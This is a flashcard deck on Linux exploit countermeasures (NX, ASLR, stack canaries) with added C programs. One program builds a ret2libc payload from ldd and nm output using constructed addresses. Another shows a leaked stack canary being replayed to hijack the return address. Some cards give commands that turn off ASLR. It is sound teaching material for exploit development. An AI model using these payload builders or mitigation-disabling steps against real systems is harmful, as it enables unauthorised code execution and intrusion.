Linux Exploit Countermeasures & Bypasses Flashcards
(35 cards)
This tool/script can be used to examine an executable and display which exploit mitigations it uses (NX, stack canary, PIE, RELRO, FORTIFY), e.g. checksec --file=./target
checksec
https://github.com/slimm609/checksec.sh
This is one of the most widespread countermeasures and is found in nearly all modern software. The idea is that pages holding data (the stack in particular, but also the heap and other writable mappings) are not executable. Often referred to as DEP (Data Execution Prevention)
No eXecute (NX)
AMD implements this with the No eXecute (NX) bit in the page-table entry. What does Intel call it?
Execute Disable (XD) bit; present on both 32-bit (with PAE paging) and 64-bit processors
If you try to execute data that lies on the stack, for example after redirecting the execution flow back to the stack with a buffer overflow, the program is killed by which signal?
SIGSEGV (segmentation fault: the CPU faults on the instruction fetch from a non-executable page)
True / False
NX disallows executing data on the stack, but having function arguments on the stack is perfectly fine
True (this is exactly what ret2libc relies on: the stack holds only addresses and arguments, the code that runs already lives in libc)
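Added example, not part of the original flashcard deck: NX is a page-permission check, so it can be observed directly. The program maps one read/write page, copies a tiny "return 42" stub into it and calls it: with NX enforced the instruction fetch raises SIGSEGV (caught with sigsetjmp/siglongjmp so the demo can report it instead of dying). The same bytes run after mprotect() adds PROT_EXEC. Assumptions: Linux, x86 or aarch64 (the stub bytes are per architecture), and a kernel that permits PROT_EXEC on anonymous memory.

```c
// Added example (not from the original flashcards): observe NX/DEP directly.
#define _GNU_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* Machine code for "return 42": the "data" we will try to run. */
#if defined(__x86_64__) || defined(__i386__)
static const unsigned char STUB[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };            /* mov eax,42 ; ret */
#elif defined(__aarch64__)
static const unsigned char STUB[] = { 0x40, 0x05, 0x80, 0x52, 0xc0, 0x03, 0x5f, 0xd6 }; /* mov w0,#42 ; ret */
#else
#error "stub bytes provided only for x86 and aarch64"
#endif

static sigjmp_buf recover_point;

static void on_segv(int sig) {
    (void)sig;
    siglongjmp(recover_point, 1);   /* abandon the faulting call, back into try_execute */
}

/* Call `page` as a function. Returns its result, or -1 if the CPU raised
 * SIGSEGV on the instruction fetch (what NX does for a non-executable page). */
static int try_execute(void *page) {
    struct sigaction sa, old;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old);

    volatile int result = -1;
    if (sigsetjmp(recover_point, 1) == 0) {
        int (*fn)(void);
        memcpy(&fn, &page, sizeof fn);   /* object pointer -> function pointer */
        result = fn();
    }
    sigaction(SIGSEGV, &old, NULL);
    return result;
}

/* One anonymous read/write page holding the stub. */
static void *map_stub(void) {
    size_t psz = (size_t)sysconf(_SC_PAGESIZE);
    void *page = mmap(NULL, psz, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED) return NULL;
    memcpy(page, STUB, sizeof STUB);
    return page;
}

/* 1 if executing the RW page faulted (NX enforced), 0 if it ran, -1 on mmap failure. */
int nx_blocks_rw_page(void) {
    void *page = map_stub();
    if (!page) return -1;
    int r = try_execute(page);
    munmap(page, (size_t)sysconf(_SC_PAGESIZE));
    return r == -1 ? 1 : 0;
}

/* The same bytes after mprotect(PROT_READ|PROT_EXEC): returns 42, i.e. NX is a
 * page-permission check, not a property of "the stack". -2 if mprotect refused. */
int value_after_mprotect_exec(void) {
    void *page = map_stub();
    if (!page) return -1;
    size_t psz = (size_t)sysconf(_SC_PAGESIZE);
    if (mprotect(page, psz, PROT_READ | PROT_EXEC) != 0) { munmap(page, psz); return -2; }
    __builtin___clear_cache((char *)page, (char *)page + sizeof STUB);  /* required on aarch64 */
    int r = try_execute(page);
    munmap(page, psz);
    return r;
}

int main(void) {
    printf("calling into a RW page: %s\n",
           nx_blocks_rw_page() == 1 ? "SIGSEGV (NX enforced)" : "ran without fault (no NX!)");
    printf("same bytes after mprotect(PROT_READ|PROT_EXEC): returned %d\n",
           value_after_mprotect_exec());
    return 0;
}
```

A binary that checksec reports as "NX enabled" has a non-executable stack segment; the mprotect() half shows why NX alone does not stop attackers who can reach code that changes page permissions or who reuse existing executable code (ret2libc, ROP).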
This command can be used to check whether the target binary is dynamically linked against libc (the standard C library on Linux) and where it is loaded
ldd (note: ldd may execute the binary's dynamic loader, so only run it on binaries you trust)
Using this command you can list all (non-underscore) functions exported by your system's libc.
nm -D /lib/$(uname -m)-linux-gnu/libc-*.so | grep -vw U | grep -v "_" | cut -d " " -f3
(grep -vw U drops undefined symbols; on glibc 2.34 and later the file is named libc.so.6, so replace libc-*.so accordingly)
This is the distance between the library's base address and the target function's address. It is fixed for a given libc build, so function address = base + this value
offset
In order to execute a function that lives in libc (ret2libc), we need these 3 steps (as specified in XDS)
- Find an interesting function that will provide us with a shell (e.g. system())
- Set up the stack properly (a return address for that function, followed by its argument, e.g. a pointer to "/bin/sh")
- Overwrite the EIP with the above-mentioned function's address
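Added example, not part of the original flashcard deck: the three ret2libc steps as code, on the 32-bit layout the cards assume (EIP). The inputs are constructed sample lines in the shape ldd and nm -D print; the libc base, the symbol offsets, the "/bin/sh" offset and the 76-byte padding are illustrative values, not taken from a real system. The base read from ldd is only meaningful with ASLR off (randomize_va_space = 0); with ASLR on it changes every run and has to be leaked instead.

```c
// Added example (not from the original flashcards): build a ret2libc payload
// from ldd/nm output. All addresses and offsets below are constructed.
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample of `ldd ./vuln` output. The value in parentheses is the
 * address the library was mapped at, i.e. its base (only stable with ASLR off). */
static const char LDD_SAMPLE[] =
    "\tlinux-gate.so.1 (0xb7fd8000)\n"
    "\tlibc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e0b000)\n"
    "\t/lib/ld-linux.so.2 (0xb7fd9000)\n";

/* Constructed sample of `nm -D /lib/i386-linux-gnu/libc.so.6` output. The first
 * column is the symbol's offset from the library base; U lines have none. */
static const char NM_SAMPLE[] =
    "0002e9d0 T exit@@GLIBC_2.0\n"
    "         U _rtld_global\n"
    "0003ada0 W system@@GLIBC_2.0\n"
    "00049c00 T printf@@GLIBC_2.0\n";

/* Offset of the "/bin/sh" string inside libc, as found with
 * `strings -a -t x libc.so.6 | grep /bin/sh` (constructed value). */
#define BINSH_OFFSET 0x0015ba0bu

/* Where libc is loaded: the base from the ldd line, 0 if not found. */
uint32_t libc_base_from_ldd(const char *ldd_output) {
    const char *line = strstr(ldd_output, "libc.so.6");
    const char *paren = line ? strchr(line, '(') : NULL;
    unsigned long base = 0;
    if (!paren || sscanf(paren, "(0x%lx)", &base) != 1) return 0;
    return (uint32_t)base;
}

/* Step 1: the offset of `name` in the nm listing ("name" or "name@@VERSION"). */
uint32_t symbol_offset(const char *nm_output, const char *name) {
    const char *p = nm_output;
    while (p && *p) {
        unsigned long off; char type; char sym[128];
        if (isxdigit((unsigned char)*p) && sscanf(p, "%lx %c %127s", &off, &type, sym) == 3) {
            char *ver = strchr(sym, '@');
            if (ver) *ver = '\0';
            if (strcmp(sym, name) == 0) return (uint32_t)off;
        }
        p = strchr(p, '\n');
        if (p) p++;
    }
    return 0;
}

static void put_le32(unsigned char *d, uint32_t v) {
    d[0] = v & 0xff; d[1] = (v >> 8) & 0xff; d[2] = (v >> 16) & 0xff; d[3] = v >> 24;
}

/* Little-endian word `idx` of the fake frame that starts at `pad`. */
uint32_t payload_word(const unsigned char *payload, size_t pad, int idx) {
    const unsigned char *p = payload + pad + 4 * idx;
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Steps 2 and 3: pad up to the saved EIP, then lay out the classic frame
 *   [ padding ][ &system ][ &exit = system's return address ][ &"/bin/sh" = system's argument ]
 * Returns the payload length, 0 if it does not fit in `out`. */
size_t build_ret2libc(uint32_t base, uint32_t sys_off, uint32_t exit_off, uint32_t binsh_off,
                      size_t pad, unsigned char *out, size_t out_len) {
    if (pad + 12 > out_len) return 0;
    memset(out, 'A', pad);
    put_le32(out + pad,     base + sys_off);    /* overwrites saved EIP */
    put_le32(out + pad + 4, base + exit_off);   /* where system() returns: exit cleanly */
    put_le32(out + pad + 8, base + binsh_off);  /* first argument of system() */
    return pad + 12;
}

int main(void) {
    unsigned char payload[256];
    uint32_t base = libc_base_from_ldd(LDD_SAMPLE);
    size_t n = build_ret2libc(base, symbol_offset(NM_SAMPLE, "system"),
                              symbol_offset(NM_SAMPLE, "exit"), BINSH_OFFSET,
                              76, payload, sizeof payload);
    fprintf(stderr, "libc base 0x%08x, system() at 0x%08x, payload %zu bytes\n",
            base, base + symbol_offset(NM_SAMPLE, "system"), n);
    fwrite(payload, 1, n, stdout);   /* e.g. ./build > payload; ./vuln "$(cat payload)" */
    return 0;
}
```

The padding (76 here) is the distance from the start of the overflowed buffer to the saved EIP and has to be measured per target; the three words after it are what NX cannot stop, since nothing on the stack is executed.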
This is an exploit countermeasure introduced at the operating-system level. When it is turned on, every time a new process is launched its core memory areas (stack, heap, shared libraries and, for PIE executables, the program itself) are mapped at different addresses.
ASLR (Address Space Layout Randomization)
Which file holds the ASLR setting?
randomize_va_space
/proc/sys/kernel/randomize_va_space
If the value of randomize_va_space is 0, what does it mean?
ASLR is OFF
If the value of randomize_va_space is 1, what does it mean?
ASLR is ON: the stack, the mmap base (shared libraries), the virtual dynamic shared object (vDSO) page and shared memory regions are randomized
If the value of randomize_va_space is 2, what does it mean?
ASLR is ON and, in addition to 1, the data segment (the brk-based heap) is randomized too (this is the default)
To set the ASLR value permanently, which file do you append to, and with what line?
/etc/sysctl.conf
kernel.randomize_va_space=0
(0 disables it, a lab setting only; use 2 to keep it fully enabled. Apply without reboot with sysctl -p, or change it temporarily with echo 0 > /proc/sys/kernel/randomize_va_space)
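Added example, not part of the original flashcard deck: read the sysctl above and watch its effect. The program starts two short-lived processes (cat /proc/self/maps) and compares where their [stack] mapping landed; with ASLR on the two bases differ, with it off they are identical. Assumes Linux with /proc and /bin/sh available; the description strings follow the three sysctl values from the cards.

```c
// Added example (not from the original flashcards): check and observe ASLR.
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Value of /proc/sys/kernel/randomize_va_space, or -1 if it cannot be read. */
int aslr_setting(void) {
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    if (!f) return -1;
    int v = -1;
    if (fscanf(f, "%d", &v) != 1) v = -1;
    fclose(f);
    return v;
}

const char *describe_aslr(int v) {
    switch (v) {
    case 0:  return "off";
    case 1:  return "stack, mmap base, vDSO and shared memory randomized";
    case 2:  return "as 1, plus the brk-based heap (data segment)";
    default: return "unknown";
    }
}

/* Start a fresh process (`cat /proc/self/maps`) and return the start address
 * of its [stack] mapping, 0 on failure. Every exec() gets a new layout, so
 * successive calls differ when ASLR is on. fork() alone would not show this:
 * the child inherits the parent's layout unchanged. */
unsigned long fresh_process_stack_base(void) {
    FILE *p = popen("cat /proc/self/maps", "r");
    if (!p) return 0;
    char line[512];
    unsigned long start = 0;
    while (fgets(line, sizeof line, p)) {
        if (strstr(line, "[stack]")) {
            sscanf(line, "%lx-", &start);   /* "b7fd0000-b7ff1000 rw-p ... [stack]" */
            break;
        }
    }
    pclose(p);
    return start;
}

/* 1 if two fresh processes got different stack bases, 0 if identical, -1 if unobservable. */
int stack_randomized(void) {
    unsigned long a = fresh_process_stack_base();
    unsigned long b = fresh_process_stack_base();
    if (!a || !b) return -1;
    return a != b;
}

int main(void) {
    int v = aslr_setting();
    printf("randomize_va_space = %d (%s)\n", v, describe_aslr(v));
    printf("stack base differs between two new processes: %d\n", stack_randomized());
    /* To run a single program without ASLR while the sysctl stays at 2:
     *   setarch $(uname -m) -R ./target   (sets ADDR_NO_RANDOMIZE for that process only) */
    return 0;
}
```

For a ret2libc exploit this is the check that decides whether a libc base read once from ldd or gdb will still be valid on the next run.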
This is another exploit mitigation employed on Linux systems. It is also known as stack canary, stack protector, stack guard or SSP (Stack Smashing Protector), enabled at compile time with gcc -fstack-protector
Stack Cookie
This is a 4-byte value (8 bytes on 64-bit) placed on the stack between the local variables and the saved return address when a function is entered.
Stack Canary
When the function finishes and its stack frame is torn down, the cookie on the stack is compared with the original value (glibc keeps it in thread-local storage: gs:0x14 on 32-bit, fs:0x28 on 64-bit). If it differs, the program is terminated by calling this function. What is this function?
__stack_chk_fail
This one is a type of stack cookie. It is a 4-byte value generated at program start from a random source, e.g. /dev/urandom or the kernel-supplied AT_RANDOM bytes
Random Canary
This one is a type of stack cookie. The random canary is additionally XOR'ed with stored control data (e.g. the return address), so an attacker has to know both to forge it
Random XOR Canary
This one is a type of stack cookie. The canary has the value 0x00000000; the assumption is that string-copy overflows cannot deliver zeroes to the stack, because 0x00 terminates a C string
Null Canary
This one is a type of stack cookie. The canary is a combination of string terminators such as 0x00, 0xff, 0x0a and 0x0d, so str* and line-oriented copy functions (strcpy, gets, fgets) stop before they can reproduce it
Terminator Canary
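Added example, not part of the original flashcard deck: the cookie check that -fstack-protector emits, written out by hand on a frame laid out as a struct so the overflow can be inspected instead of crashing. It shows a random canary catching a blind overflow, a leaked canary being replayed to get past the check, and why a terminator canary survives strcpy-style copies but not memcpy-style ones. The 32-bit layout follows the cards; the canary values, the return address and the attacker payload are constructed, not read from /dev/urandom or a real binary.

```c
// Added example (not from the original flashcards): stack cookie check by hand.
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout the compiler produces with -fstack-protector: locals, then the
 * canary, then the saved frame pointer and return address (32-bit). */
struct frame {
    unsigned char buf[16];
    uint32_t canary;
    uint32_t saved_ebp;
    uint32_t saved_eip;
};

#define ORIGINAL_EIP      0x08048500u  /* constructed: the legitimate return address */
#define RANDOM_CANARY     0x1b7f2a9cu  /* constructed; a real one comes from /dev/urandom or AT_RANDOM */
#define TERMINATOR_CANARY 0x0aff0d00u  /* low byte 0x00 is the first byte in memory (little-endian) */

/* Emulates a function that copies `input` into its 16-byte local without a
 * bounds check, then runs the epilogue check. `use_memcpy` selects a
 * length-based copy (memcpy/read) versus a NUL-terminated one (strcpy/gets).
 * Returns 1 if the cookie survived, 0 if __stack_chk_fail() would be called;
 * *eip_after receives whatever ended up in the return-address slot. */
int run_frame(uint32_t canary, const unsigned char *input, size_t input_len,
              int use_memcpy, uint32_t *eip_after) {
    struct frame f;
    memset(&f, 0, sizeof f);
    f.canary    = canary;            /* prologue: store the cookie below the saved EIP */
    f.saved_eip = ORIGINAL_EIP;

    size_t n = use_memcpy ? input_len : strlen((const char *)input) + 1;
    if (n > sizeof f) n = sizeof f;  /* keep the overflow inside our fake frame */
    memcpy((unsigned char *)&f, input, n);   /* the overflow: buf sits at offset 0 */

    *eip_after = f.saved_eip;
    return f.canary == canary;       /* epilogue: cmp cookie ; jne __stack_chk_fail */
}

static void put_le32(unsigned char *d, uint32_t v) {
    d[0] = v & 0xff; d[1] = (v >> 8) & 0xff; d[2] = (v >> 16) & 0xff; d[3] = v >> 24;
}

/* An attacker's payload: fill the buffer, replay the cookie they believe is in
 * place, a dummy saved EBP, then the new return address. Returns its length. */
size_t craft_payload(unsigned char *out, uint32_t cookie_guess, uint32_t new_eip) {
    memset(out, 'A', 16);
    put_le32(out + 16, cookie_guess);
    put_le32(out + 20, 0xdeadbeefu);
    put_le32(out + 24, new_eip);
    return 28;
}

int main(void) {
    unsigned char payload[32], blind[28];
    uint32_t eip;
    size_t len;

    /* 1. Blind overflow of 28 'A's: the cookie is clobbered, the check fails. */
    memset(blind, 'A', sizeof blind);
    printf("blind overflow, random canary:   check %s\n",
           run_frame(RANDOM_CANARY, blind, sizeof blind, 1, &eip) ? "passed" : "FAILED -> abort");

    /* 2. The cookie was leaked (format string, uninitialised read...) and is
     *    replayed: the check passes and EIP is hijacked. */
    len = craft_payload(payload, RANDOM_CANARY, 0xdeadc0deu);
    printf("leaked random canary via memcpy: check %s, eip=0x%08x\n",
           run_frame(RANDOM_CANARY, payload, len, 1, &eip) ? "passed" : "FAILED", eip);

    /* 3. Terminator canary, strcpy-style copy: the 0x00 the attacker must
     *    reproduce ends the copy, so the cookie is intact but EIP is untouched. */
    len = craft_payload(payload, TERMINATOR_CANARY, 0xdeadc0deu);
    printf("terminator canary via strcpy:    check %s, eip=0x%08x\n",
           run_frame(TERMINATOR_CANARY, payload, len, 0, &eip) ? "passed" : "FAILED", eip);

    /* 4. Same cookie, length-based copy: 0x00 is just another byte, hijack works. */
    printf("terminator canary via memcpy:    check %s, eip=0x%08x\n",
           run_frame(TERMINATOR_CANARY, payload, len, 1, &eip) ? "passed" : "FAILED", eip);
    return 0;
}
```

Case 2 is the practical takeaway: the cookie only protects the return address as long as its value stays secret, so an information leak in the same process turns the canary into four bytes of padding.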